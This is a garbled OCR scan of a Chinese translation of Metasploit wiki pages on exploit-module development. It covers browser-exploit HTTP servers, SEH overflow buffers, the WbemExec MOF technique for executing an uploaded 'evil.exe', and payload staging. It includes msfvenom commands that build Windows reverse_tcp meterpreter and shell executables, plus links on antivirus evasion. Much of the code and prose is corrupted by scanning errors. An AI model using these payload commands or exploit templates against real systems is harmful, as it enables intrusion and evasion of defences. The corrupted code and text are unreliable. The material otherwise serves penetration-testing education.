数据 存储 选项 ， 否 则 混淆 不 会 启动 。 此 选项 是 一 个 OptiInt， 它 允许 您 设置 混淆 次 数 (默认 值 为 
0) » 


deregister options('JsObfuscate') 


如 果 您 的 基于 BES 的 攻击 根本 不 需要 混淆 ， 请 务必 调用 #deregister_options 并 移 除 
JsObfuscate 选 项 。 像 这 样 : 


deregister options('JsObfuscate') 


要 了 解 有 关 Metasploit 的 JavaScript 混 淆 功能 的 更 多 信息 ， 请 阅读 How to obfuscate JavaScript 
in Metasploit. 


相关 文章 


e https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit- 
using-HttpServer 

e https://github.com/rapid7/metasploit-framework/wiki/Information-About-Unmet-Browser- 
Exploit-Requirements 


Metasploit 框 架 提供 了 可 让 你 用 于 开发 浏览 器 exploit 的 不 同 mixin， 主 要 

A Msf::Exploit::Remote::HttpServer, Msf::Exploit::Remote::HttpServer:: HTML and 
Msf::Exploit::Remote::BrowserExploitServer. 这 篇 文章 主要 涵盖 HttpServer mixin. HttpServer 
mixin 是 所 有 HTTP 服 务 器 mixin 的 母亲 ( 像 BrowserExploitServer 和 HttpServer::HTML). 要 使 
用 它 ， 你 的 模块 需要 有 一 个 “on request uri 方法， 这 个 方法 是 HTTP 服 务 器 收 到 来 自 浏览 器 
的 HTTP 请 求 时 触发 的 回调 。 设 置 "on_redquest _uri" 的 例子 : 


# Listens for a HTTP request. 
4 cli is the socket object, and request is a Rex::Proto::Http::Request object 
def on request uri(cli, request) 


print status("Client requests URI: #{request.uri}") 
end 


“on_request_uri" 方 法 也 是 您 可 以 创建 HTTP 响 应 的 地 方 。 这 里 有 几 个 选择 可 以 用 来 做 这 一 
mu 


e send not found(cli) - 发 送 404 到 客户 端 。 确 保 传 递 cli (REF) 对 象 。 

e send redirect(cli, location='/", body=", headers={}) - 将 客户 端 重 定向 到 一 个 新 的 位 
Zo 

e send_response(cli, body, headers={}) - 向 客户 端 发 送 响应 。 这 种 方法 可 能 是 你 大 部 分 
时 间 使 用 的 方法 。 如 果 你 看 过 我 们 的 一 些 exploit 模 块 ， 你 也 可 以 使 用 
Exploit::Remote::HttpServer:: HTML 代替 Exploit::Remote::HttpServer. H i£ X 2 48 IF] > IX 
4 Æ T Exploit::Remote::HttpServer:: HTML mixin T YA3E 4537 I9] — X Javascript $ a > de 
Base64 > heap spraying > OS detection, # » 以 下 是 发 送 HTTP 响 应 的 示例 : 


# Sends a "Hello, world!" to the client 
detüonmmequestctsurg (Clim request) 
html = "Hello, world!" 


send_response(cli, html) 
end 


另 请 注意 ， 为 了 处 理 HTTP 请 求 ， 它 必须 包含 基本 的 URIPATH， 默 认 情 况 下 是 随机 的 。 这 意味 
着 如 果 你 想 处 理 多 个 URI (如 果 你 需要 处 理 重 定向 或 链接 的 话 可 能 ) ， 你 还 需要 确保 它们 具有 
基本 的 URIPATH。 要 检索 基本 的 URIPATH， 可 以 使 用 “get_resource” 方 法 ， 下 面 是 一 个 例 

UA: 


def serve page 1(cli) 
html = "This is page 1" 
send response(cli, html) 
end 


def serve page 2(cli) 
html = "This is page 2" 
send response(cli, html) 
end 


def serve default page(cli) 
html = %Q| 
<html> 
«a href="#{get_resource.chomp('/')}/page_1.html">Go to page 1</a><br> 
«a href="#{get_resource.chomp('/')}/page_2.html">Go to page 2</a> 
</html> 


send response(cli, html) 
end 


def on request uri(cli, request) 
case request.uri 
when /page 1N.html$/ 
serve page 1(cli) 
when /page 2N.html$/ 
serve page 2(cli) 
else 
serve default page(cli) 
end 
end 


当然 ， 当 你 编写 Metasploit 浏 览 器 漏洞 的 时 候 ， 还 有 很 多 需要 考虑 的 东西 。 例 如 ， 您 的 模块 可 
能 需要 执行 浏览 PON , nii ay iS BOICIE IR TL CA REGLAS o TET SEXE SR 
建 特定 于 目标 的 负载 ， 这 意味 着 您 的 模块 需要 知道 它 的 目标 是 什么 ， 并 且 必 须 构建 一 个 方法 

来 相应 地 定制 漏洞 利 x *F o HttpServerfeHttpServer:: HTML mixin 提 供 各 种 方法 让 你 完成 所 有 
这 些 。 确 保 查 看 API 文 档 (可 以 通过 运行 msf / documentation / gendocs.sh， 或 者 只 是 在 msf 
目录 中 运行 “yard”) 或 者 检查 现 有 的 代码 示例 (特别 是 最 近 的 代码 示例 ) 。 为 了 使 事情 开始 ， 
您 可 以 始终 使 用 以 下 模板 开始 开发 浏览 器 利用 : 


Home 


HE 


à This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 


HH 
require 'msf/core' 


class MetasploitModule « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::HttpServer 


def initialize(info={}) 
super(update info(info, 


'Name' -» "HttpServer mixin example", 
'Description' => %q{ 

Here's an example of using the HttpServer mixin 
}, 
'License' -» MSF LICENSE, 
"Author ' => [ 'sinn3r' ], 
"References' => 


[ 'URL', 'http://metasploit.com' ] 
], 


'Platform' => 'win', 
Targets: => 


[ 'Generic', {} ], 


], 
'DisclosureDate' => "Apr 1 2013", 
'DefaultTarget' => 0)) 
end 


def on request uri(cli, request) 
html - "hello" 
send response(cli, html) 

end 


end 


如 果 你 想 仔细 看 看 mixin 可 以 做 什么 ， 请 看 


https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb 
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么 常见 ， 因 为 它们 很 可 能 是 用 SafeSEH 编 译 的 。 有 一 点 ， 即 使 在 启用 了 SafeSEH 的 情况 下 ， 
仍然 有 可 能 通过 堆 喷 来 滥用 异常 处 理 程序 ， 但 是 当然 ， 内 存 保护 并 不 止 于 此 。DEP/ASLR 最 
终 来 拯救 ， 所 以 几乎 结束 了 SEH 漏 洞 的 辉煌 岁月 。 您 可 能 仍然 可 以 找到 不 利用 SafeSEH 编 译 
的 易 受 攻击 的 应 用 程序 ， 但 是 该 应 用 程序 可 能 已 经 过 时 ， 不 再 维护 ， 或 者 它 更 像 是 开发 人 员 
的 学 习 实 验 。 哦 ， 这 可 能 已 经 是 一 个 漏洞 了 。 尽 管 如 此 ， 利 用 异常 处 理 来 利用 堆栈 缓冲 区 溢 
出 还 是 有 趣 的 ， 所 以 如 果 你 遇 到 它 ， 使 用 sen mixin 


为 了 能 够 使 用 SEH mixin， 必 须 满足 一 些 可 利用 的 需求 : 


e 易 受 攻击 的 程序 没有 SafeSEH 
没有 DEP (数据 执行 保护 ) 。mixin 使 用 短暂 的 跳 转 来 执行 有 效 载荷 ， 这 意味 着 内 存 必 须 
是 可 执行 的 。 正 如 名 字 所 上 暗示 的 ，DEP 阻 止 了 这 一 点 。 


e / 


示例 
首先 ， 确 保 你 在 你 的 模块 的 Metasploit3 类 的 范围 内 包含 了 seh mixin 


include Msf::Exploit::Seh 


接 下 来 ， 您 需要 Ret 来 为 SE 处 理 程序 设置 一 个 地 址 。 这 个 地 址 应 该 放 在 你 的 模块 的 元 数据 
中 ， 具 体 在 下 面 的 targets 。 在 Metasploit 中 ， 每 个 目标 实际 上 是 一 个 由 两 个 元 素 组 成 的 数 
组 。 第 一 个 元 素 只 是 目标 的 名 称 (目前 没有 严格 的 命名 风格 ) ， 第 二 个 元 素 实 际 上 是 一 个 字 
典 ， 其 中 包含 特定 于 该 目标 的 信息 ， 例 如 目标 地 址 。 以 下 是 设置 Ret 地 址 的 示例 : 


'Targets' => 


[ 'Windows XP', {'Ret' => 0x75022ac4 } ] # p/p/r in ws2help.dll 
] 


正如 你 所 看 到 的 ， 记 录 Ret 地 址 的 作用 以 及 指向 那个 DLL 也 是 一 个 好 习惯 。 Ret 实 际 上 是 一 种 
特殊 的 key， 因 为 它 可 以 通过 target.ret 在 模块 中 使 用 。 在 我 们 的 下 一 个 例子 中 ， 你 会 看 

到 target.ret 被 用 来 代替 原始 目标 地 址 的 编码 。 如果 您 需要 一 个 工具 来 为 ret 地 址 查找 
POP/POP/RET, 你 能 使 用 metasploit 的 msfbinscan 工具 , 它 位 于 tools 目 录 下 . 好 的 ， 现 在 我 们 来 
看 看 这 些 方法 。 seh mixin 提供 了 两 种 方法 : 


e generate seh payload -生成 一 个 虚假 的 SEH 记 录 ， 并 在 之 后 附 上 有 效 载荷 。 这 是 一 个 例 
us 


buffer = '' 

buffer << "A" * 1024 # 1024 bytes of padding 

buffer << generate seh payload(target.ret) # SE record overwritten after 1024 byte 
S 


buffer 内 存 中 的 实际 布局 应 该 是 这 样 的 : 
[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Payload ] 
* generate seh record -在 没有 有 效 载荷 的 情况 下 生成 假 SEH 记 录 ， 以 防 您 想 将 有 效 载荷 
放置 在 其 他 地 方 。 代 码 示 例 : 


buffer = '' 

buffer << "A" * 1024 # 1024 bytes of padding 
buffer «« generate seh payload(target.ret) 
buffer << "B" * 1024 # More padding 


内 存 布局 应 该 是 这 样 的 : 


[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Padding ] 


参考 


https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and- 
basic-tutorial-part-3-seh/ 


https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/exploitation/seh.rb 


https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/seh.rb 


Windows È 3€ 3,25, (WMI) 是 Microsoft 实 施 的 基于 Web 的 企业 管理 (WBEM) ， 它 使 用 管理 
对 象 格 式 (MOF) 来 创建 通用 信息 模型 (CIM) 类 。 在 Stuxnet 诞 生 之 前 ， 安 全 社区 实际 上 并 
不 熟悉 这 种 技术 的 恶毒，Stuxnet 使 用 MOF 文 件 来 利用 漏洞 ， 允 许 攻 击 者 通过 假 打 印 机 后 台 处 
理 程序 服务 创建 文件 。 这 个 技术 后 来 在 Metasploit 的 ms10_061_spoolss.rb 模 块 中 进行 了 逆向 
和 演示 ， 这 大 大 改变 了 我 们 处 理 写 入 权限 攻击 的 方式 。 一 般 来 说 ， 如果 你 发 现 自己 能 够 写 入 

system32， 你 很 可 能 会 利用 这 种 技术 。 


要 能 够 使 用 wBemExec mixin， 您 必须 满足 以 下 要 求 : 


e C:NindowsNSystem32N 写 入 权限 
e C:NindowsNSystem32WbemN 写 入 权限 
e 目标 不 能 比 Windows Vista 更 新 (所 以 对 于 XP，Win 2003 或 更 早 的 版 本 来 说 ， 这 些 功能 
大 多 是 好 的 ) 。 这 更 多 的 是 API 的 限制 ， 而 不 是 技术 。 较 新 的 Windows 操 作 系 统 需 要 首先 
预 编译 MOF 文 件 。 
用 法 


首先 ， 在 你 的 Metasploit3 类 范围 内 包含 wbemExec mixin 。 您 还 需要 exe mixin 生 成 一 个 可 
执行 文件 : 


include Msf::Exploit::EXE 
include Msf::Exploit::WbemExec 


接 下 来 ， 生 成 有 效 载 荷 名 称 和 可 执行 文件 : 


payload name = "evil.exe" 
exe - generate payload exe 


然后 使 用 该 generate_mof 方 法 生成 mof 文 件 。 第 一 个 参数 应 该 是 mof 文 件 的 名 称 ， 第 二 个 参数 
是 有 效 负载 名 称 : 


mof name = "evil.mof" 
mof = generate mof(mof name, payload name) 


现在 ， 您 已 经 准备 好 将 文件 写 入 /上 传 到 目标 机 器 。 始 终 确 保 您 首先 上 传 有 效 负 载 可 执行 文件 


到 C:\Windows\System32\ ° 


upload file to system32(payload name, exe) # Write your own upload method 


后 现在 你 可 以 上 传 mof 文件 到 C:NWindowsNSystem32NwbemN : 


Home 


upload mof(mof name, mof) # Write your own upload method 


一 旦 mof 文 件 被 上 传 ，Windows 管 理 服 务 应 该 选择 并 执行 它 ， 这 将 最 终 在 system32 中 执行 你 


的 有 效 载 荷 。 另 外 ， 使 用 后 ，mof 文 件 将 自动 移出 mof 目 录 。 


参考 


https://github.com/rapid7/metasploit- 
framework/blob/master/lib/msf/core/exploit/wbemexec.rb 


https://github.com/rapid7/metasploit- 
framework/blob/master/modules/exploits/windows/smb/ms10 061 spoolss.rb 
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Æ Metasploit# sk F 4& M 2 AA mixin z — TER 4-89 3E». AART fie ES] E E g GE E 
储 选项 ， 变 量 ， 方 法 等 问题 .超级 调用 仅 适用 于 一 个 mixin 等 。 这 被 认为 是 高 级 的 模块 开发 ， 有 
时 可 能 是 相当 痛苦 地 再 清 自己 的 。 为 了 改善 Metasploit 的 开发 体验 ， 我 们 举 几 个 例子 来 演示 常 
见 的 场景 ， 需 要 使 用 多 个 mixin 来 实现 开发 。 


今天 的 课程 : 发 送 HTTP 请 求 来 攻击 目标 机 器 ， 并 使 用 
HttpServer 来 传送 负载 。 


或 Web 应 用 程序 。 你 可 以 代码 执行 ， 但 你 需要 找到 一 种 方式 来 提 


假设 您 想 要 利用 Web 服 务 器 
能 是 一 个 可 执行 文件 ) ， 而 HTTP 服 务 器 恰好 是 你 的 选择 。 这 里 是 你 如 


供 最 终 的 有 效 载荷 (可 
何 设 置 它 : 


Home 


THÉ 
à This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
THÉ 


require 'msf/core' 


class MetasploitModule « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::HttpClient 
include Msf::Exploit::Remote::HttpServer: :HTML 


def initialize(info={}) 
super(update info(info, 


'Name' -» "HttpClient and HttpServer Example", 
'Description' => %q{ 
This demonstrates how to use two mixins (HttpClient and HttpServer) at the sam 
e time, 
but this allows the HttpServer to terminate after a delay. 
3 
'License' -» MSF LICENSE, 
' Author ' => [ 'sinn3r' ], 
'References' => 
['URL', 'http://metasploit.com'] 
1, 
'Payload' => { 'BadChars' => "\x00" }, 
'Platform' => 'win', 
(angers. => 
[ 'Automatic', (3 ], 
1, 
'Privileged' -» false, 


'DisclosureDate' => "Dec 09 2013", 
'DefaultTarget' => 0)) 


register options( 


OptString.new('TARGETURI', [true, 'The path to some web application', '/']), 
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wa 
it before termination', 10]) 
], self.class) 
end 


def on request uri(cli, req) 
print_status("#{peer} - Payload request received: #{req.uri}") 
send response(cli, 'You get this, I own you') 

end 


def primer 
print status("Sending a malicious request to #{target_uri.path}") 
send request cgi(('uri'-»normalize uri(target uri.path))) 

end 


def exploit 
begin 
Timeout.timeout(datastore['HTTPDELAY']) ( super } 
rescue Timeout::Error 
# When the server stops due to our timeout, this is raised 
end 
end 
end 


以 下 是 运行 上 述 示例 时 发 生 的 情况 : 
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1. 封 装 在 Timeout 块 的 超级 调用 将 启动 Web 服 务 器 。 2. 在 Web 服 务 器 处 于 无 限 循环 状态 之 前 ， 
会 调用 primer() 方 法 ,这 是 您 发 送 恶 意 请 求 以 获取 代码 执行 的 地 方 。3. 您 的 HttpServer 根 据 请 求 
提供 最 终 的 有 效 载荷 4.10 秒 后 ， 模 块 引发 超时 异常 。VVeb 服 务 器 终止 。 


如 果 你 想 知 道 为 什么 Web 服 务 器 必须 在 一 段 时 间 后 终止 ， 这 是 因为 如 果 模 块 无 法 在 目标 机 器 
上 执行 代码 执行 ， 显 然 它 永 远 不 会 询问 你 的 Web 服 务 器 的 恶意 负载 ， 所 以 没有 意义 永远 保持 
活动 .通常 情况 下 ， 获 得 有 效 载荷 请 求 也 不 需要 很 长 时 间 ， 所 以 我 们 保持 了 超时 。 上 例 的 输出 
应 该 如 下 所 示 : 


msf exploit(test) > run 
[*] Exploit running as background job. 


[*] Started reverse handler on 10.0.1.76:4444 

[*] Using URL: http://0.0.0.0:8080/SUuv1qjZbCibL80 

[*] Local IP: http://10.0.1.76:8080/SUuv1qjZbCibL80 

[*] Server started. 

[*] Sending a malicious request to / 

msf exploit(test) » 

ONO test - 10.0.1.76:8181 - Payload request received: /SUuviqjZbCibL8 
0 

[*] Server stopped. 


msf exploit(test) » 


相关 文章 : 


e https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HT T P-Request- 
Using-HTTPClient 

e https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit- 
using-HttpServer 

e https://community.rapid7.com/community/metasploit/blog/2012/12/17/metasploit-hooks 


使 用 Metasploit 将 文件 压缩 成 zip 格 式 非 常 简 单 。 对 于 大 多 数 用 途 ， 您 可 以 使 用 
Msf::Util::EXE.to zip 来 将 数据 压缩 到 一 个 zip 文 件 


用 法 


files = 
[ 
{data: 'AAAA', fname: 'testi.txt', comment: 'my comment'}, 
(data: 'BBBB', fname: 'test2.txt'} 
] 


zip - Msf::Util::EXE.to zip(files) 


如 果 保存 为 文件 ， 则 上 面 的 示例 将 解压 缩 出 以 下 内 容 : 


$ unzip test.zip 

Archive: test.zip 
extracting: testi.txt 
extracting: test2.txt 


payloads 如 何 工作 


payload 模 块 是 储存 在 modules/payloads/{singles, stages, stagers}/<platform> . 当 框 架 启 动 
时 ,stages 和 stagers 结 合 起 来 创造 一 个 完整 的 载荷 .您 可 以 在 exploit 中 使 用 它 。 然 后 ，handlers 
与 有 效 载荷 配对 ， 以 便 框架 知道 如 何 创 建 与 给 定 通信 机 制 的 会 话 。 


有 效 载荷 被 赋予 参考 名 称 ， 表 示 所 有 的 部 分 ， 如 下 所 示 : 


e Staged payloads: <platform>/[arch]/<stage>/<stager> 
e Single payloads: <platform>/[arch]/<single> 


这 导致 像 有 效 载 荷 像 windows/x64/meterpreter/reverse tcp .打破 这 一 点 ， 平 台 是 windows , 架 
构 是 x64 ,最 后 阶段 我 们 交付 的 是 meterpreter ,而 实现 它 的 是 reverse tcp 请 注意 ， 体 系 结构 
是 可 选 的 ， 因 为 在 某 些 情况 下 ， 它 是 不 必要 的 或 暗示 的 。 一 个 例子 

是 php/meterpreter/reverse tcp 。Arch 不 需要 PHP 有 效 载荷 ， 因 为 我 们 提供 的 是 解释 代码 ， 
而 不 是 本 地 代码 。 


singles 


单一 的 有 效 载荷 是 难以 忘怀 的 。 他 们 可 以 与 Metasploit 建 立 沟通 机 制 ， 但 他 们 不 需要 。 一 个 可 
能 需要 的 场景 的 例子 是 当 目 标 没有 网 络 访问 时 - 通过 USB 密 铀 传递 的 文件 格式 漏洞 利用 仍然 
是 可 能 的 。 


stagers 


舞台 是 一 个 小 存根 ， 旨 在 创造 某 种 形式 的 交流 ， 然 后 将 执行 转移 到 下 一 个 阶段 。 使 用 stager 解 
决 了 两 个 问题 。 首 先 ， 它 允许 我 们 最 初 使 用 一 个 小 的 有 效 载荷 来 加 载 更 多 的 功能 更 大 的 有 效 
载荷 。 其 次 ， 它 使 通信 机 制 与 最 后 阶段 分 离 成 为 可 能 ， 因 此 一 个 有 效 载 荷 可 以 与 多 个 传输 一 
起 使 用 而 不 需要 复制 代码 。 


stages 


由 于 stagers 会 照顾 到 处 理 任何 规模 的 限制 ， 为 我 们 分 配 一 大 块 内 存 来 运行 ， 所 以 stage 可 以 是 
任意 大 的 。 这 样 做 的 一 个 优点 是 能 够 用 C 这 样 的 高 级 语言 编写 最 终 阶 段 的 有 效 载荷 。 


交付 阶段 


您 希望 有 效 载荷 连接 回 的 IP 地 址 和 端口 被 龊 入 到 stager 中 。 如 上 所 述 ， 所 有 分 级 的 有 效 载 荷 不 
二 是 建立 通信 并 执行 下 一 阶段 的 小 存根 。 当 您 使 用 分 阶段 负载 创建 可 执行 文件 时 ， 您 实际 上 


过 是 
只 是 创建 了 暂 存 器 。 所 以 下 面 的 命令 会 创建 功能 相同 的 exe 文 件 : 
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msfvenom -f exe LHOST-192.168.1.1 -p windows/meterpreter/reverse tcp 
msfvenom -f exe LHOST-192.168.1.1 -p windows/shell/reverse tcp 
msfvenom -f exe LHOST-192.168.1.1 -p windows/vncinject/reverse tcp 


(请 注意 ， 这 些 功能 是 相同 的 - 有 很 多 随机 化 进入 它 ， 所 以 没有 两 个 可 执行 文件 是 完全 一 样 
Jo) 1 .Ruby 端 作为 客户 端 ， 使 用 由 stager (例如 : tcp，http，https ) Bs 
Ho * ”在 shell 阶 段 的 情况 下 ， 当 您 与 终端 进行 交互 时 ，Metasploit 会 将 远程 进程 的 输入 连接 
到 您 的 终端 ”* ”在 Meterpreter 阶 段 的 情况 下 ，Metasploit 将 开始 使 用 s o 


Home 


^N 


逃避 杀毒 软件 


阅读 这 些 链接 


e https://community.rapid7.com/community/metasploit/blog/20 14/03/26/new-metasploit- 
49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase- 
productivity-for-penetration-testers 

e http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit- 
generates-exes/ 

e http://schierlm.users.sourceforge.net/avevasion.html 

e http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection- 
ghost-writing-asm/ 


有 大 约 一 千 四 百 万 的 其 他 资源 在 那里 ,如 何 逃 避 杀 毒 软件 ， 因 此 有 关 文 章 应 该 让 你 开始 。 
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作为 一 个 用 户 ， 我 们 最 喜欢 Metasploit 的 一 件 事情 是 它 允 许 在 技术 上 很 难 理解 或 设计 出 一 些 非 
常 容易 使 用 的 东西 ， 从 字面 上 点 击 几 下 鼠标 就 可 以 让 您 看 起 来 像 Matrix 的 Neo。 这 使 黑客 非常 
容易 。 但 是 ， 如 果 你 是 Metasploit 的 新 手 ， 那 么 知道 这 一 点 : Nobody makes their first 
jump.。 估 计 你 会 犯错 误 ， 有 时 很 小 ， 有 时 甚至 是 灾难 性 的 .…: 希 望 不 会 。 你 的 第 一 个 漏洞 很 
可 能 会 落 在 你 面前 ， 为 了 像 Neo 一 样 ，。 显 然 ， 为 了 成 为 一 个 你 必须 学 会 适当 地 使 用 这 些 模 
块 ， 我 们 将 教 你 如 何 使 用 。 在 这 个 文档 中 ， 明 白 我 们 要 求 你 没有 exploit 开 发 知识 。 一 些 编程 
知识 当然 会 很 好 。 总 的 来 说 ， 在 使 用 漏洞 之 前 ， 实 际 上 有 “功课 ”， 你 应 该 一 直 做 功课 。 


载 入 metasploit 模 块 


每 个 Metasploit 模 块 都 带 有 一 些 元 数据 ， 用 来 解释 它 的 含义 ， 并 且 你 必须 首先 加 载 它 。 一 个 例 
qs 


msf > use exploit/windows/smb/ms08 067 netapi 


阅读 模块 描述 和 参数 


这 听 起 来 可 能 令 人 惊讶 ， 但 有 时 候 我 们 会 问 到 已 经 在 模块 中 解释 过 的 问题 。 在 决定 是 否 适合 
使 用 漏洞 之 前 ， 您 应 该 始终 在 描述 或 提供 的 参考 资料 中 查找 以 下 内 容 : 


e 哪些 产品 和 版 本 易 受 攻击 : 这 是 您 应 该 知道 的 关于 漏洞 的 最 基本 的 事情 

e 什么 类 型 的 漏洞 及 其 工作 原理 : 基本 上 ， 您 正在 学 习 漏 洞 的 副作用 。 例 如 ， 如 果 您 利用 
内 存 损坏 ， 如 果 由 于 任何 原因 而 失败 ， 则 可 能 会 使 服务 崩溃 。 即 使 不 是 这 样 ， 当 你 完成 
shell 并 输入 “exit* 时 ， 仍 然 有 可 能 崩溃 。 高 级 别 的 错误 通常 比较 安全 ， 但 不 是 100%。 例 
如 ， 也 许 它 需 要 修改 一 个 配置 文件 或 安装 一 些 可 能 导致 应 用 程序 被 破坏 的 东西 ， 并 可 能 
成 为 永久 性 的 。 

e 哪些 已 经 经 过 测试 : 在 开发 模块 时 ， 如 果 太 多 ， 通 常 不 会 针对 每 一 个 体系 对 漏洞 进行 测 
试 。 通 常 开发 人 员 只 是 试图 测试 他 们 可 以 得 到 的 任何 东西 。 所 以 如 果 你 的 目标 没有 在 这 
里 提 到 ， 请 记 住 ， 它 不 能 保证 它 会 100% 的 工作 。 最 安全 的 做 法 是 实际 上 重新 创建 你 的 目 
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e 服务 器 必须 满足 哪些 条 件 才能 被 利用 : 通常 ， 漏 洞 需要 多 种 条 件 才 能 被 利用 。 在 某 些 情 
况 下 ， 您 可 以 依靠 漏洞 check 命 令 ， 因 为 当 Metasploit 标 志 着 一 些 易 受 攻击 的 东西 时 ， 它 
实际 上 是 利用 了 这 个 bug。 对 于 使 用 BrowserExploitServer mixin 的 浏览 器 攻击 ， 它 还 将 在 
加 载 漏洞 利用 之 前 检查 可 利用 的 需求 。 但 是 自动 化 并 不 总 是 存在 ， 所 以 你 应 该 在 运行 这 
个 “exploit* 命 令 之 前 尝试 找到 这 个 信息 。 有 时 候 这 只 是 常识 ， 盟 的 。 例 如 : Web 应 用 程序 
的 文件 上 传 功 能 可 能 会 被 滥用 来 上 传 基 于 Web 的 后 门 程序 ， 并 且 通 常 需要 上 传 文件 夹 才 
能 被 用 户 访 问 。 如 果 你 的 目标 不 符合 要 求 ， 那 就 没有 意义 了 。 


您 可 以 使 用 info 命 令 查看 模块 的 描述 : 


msf exploit(ms08_067_netapi) > info 


阅读 目标 列表 


每 个 Metasploit 漏 洞 都 有 一 个 目标 列表 。 基 本 上 这 是 开发 人 员 在 公开 发 布 漏洞 之 前 测试 的 一 系 
列 设置 。 如 果 你 的 目标 机 器 不 在 列表 中 ， 最 好 假定 这 个 漏洞 利用 从 未 在 特定 的 设置 上 被 测试 
ato 

如 果 漏 洞 利 用 支持 自动 定位 ， 它 总 是 列表 中 的 第 一 项 〈 或 索引 0) 。 第 一 项 也 几乎 总 是 默认 的 
目标 。 这 意味 着 如 果 你 以 前 从 未 使 用 过 ， 那 么 你 永远 都 不 应 该 假定 攻击 会 自动 为 你 选择 一 个 
目标 ， 而 且 默 认 设置 可 能 不 是 你 正在 测试 的 目标 。 


show options 命令 命令 会 告诉 你 哪个 目标 被 选 中 。 例 如 : 


msf exploit(ms08_067_netapi) > show options 


show targets 命令 会 给 你 一 个 支持 的 目标 列表 : 


msf exploit(ms08 067 netapi) > show targets 


确认 全 部 选项 


所 有 Metasploit 模 块 都 预先 配置 了 大 多 数 数据 存储 选项 。 但 是 ， 它 们 可 能 不 适合 您 正在 测试 的 
特定 设置 。 要 做 一 个 快速 的 检查 ， 通 常 “show options" 命 令 就 足够 了 : 


msf exploit(ms08_067_netapi) > show options 
但 是 ，“ 显 示 选 项 " 仅 显 示 所 有 基本 选项 。 它 不 会 向 您 显示 回避 或 高 级 选项 (尝试 "显示 回 
避 ” 和 "显示 高 级 ") ， 您 应 该 使 用 显示 所 有 数据 存储 选项 的 命令 p ee 


msf exploit(msO8 067 netapi) > set 


找到 模块 的 pull 请 求 


Metasploit 存 储 库 托管 在 Github 上 (你 现 在 已 经 在 上 面 ) ， 而 开发 者 /贡献 者 依赖 它 来 进行 开 
发 。 在 模块 公开 之 前 ， 将 其 作为 最 终 测试 和 审查 的 拉 取 请 求 提交 。 在 那里 ， 你 会 发 现 几乎 所 
有 你 需要 知道 的 dde eR 也 许 你 不 会 从 阅读 模块 的 描述 或 随机 的 博客 文章 中 学 
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你 可 能 从 阅读 pull 请 求 中 学 到 的 东西 : 


e 如 何 建立 易 受 攻击 的 环境 的 步 又 

e 实际 测试 了 哪些 目标 。 

。 该 模块 是 如 何 使 用 的 。 

e 该 模块 如 何 验证 。 

。 发 现 了 什么 问题 。 您 可 能 想 知道 的 问题 。 


主要 有 两 种 方法 可 以 找到 你 正在 使 用 的 模块 的 请 求 : 
e 通过 拉 请 求 号 码 如 果 你 丨 的 知道 拉 请 求 号 码 ， 这 是 最 简单 的 。 简 单 地 去 


https://github.com/rapid7/metasploit-framework/pull/[PULL REQUEST NUMBER HERE] 


e 通过 过 滤 这 很 可 能 是 你 如 何 找到 拉 请 求 。 首 先 ， 你 应 该 去 这 里 : https : 
/github.com/rapid7/metasploit-framework/pulls。 在 顶部 ， 您 将 看 到 一 个 带 有 默认 过 滤器 
的 搜索 输入 框 is:pr is:open。 这 些 默认 值 意味 着 你 正在 查看 pull 请 求 ， 而 你 正在 查看 那些 
仍 在 等 待 处 理 的 请 求 - 仍然 等 待 被 合并 到 Metasploit。 那 么 ， 既 然 你 找 已 经 合并 的 那个 ， 
你 应 该 这 样 做 : 


e 点 击 “closed”。 


e 选择 标签 “module”。 
e 在 搜索 框 中 输入 与 模块 相关 的 其 他 关键 字 。 该 模块 的 标题 可 能 提供 最 好 的 关键 字 。 


注意 : 如 果 该 模块 是 在 2011 年 11 月 之 前 编写 的 ， 则 不 会 找到 该 请 求 。 


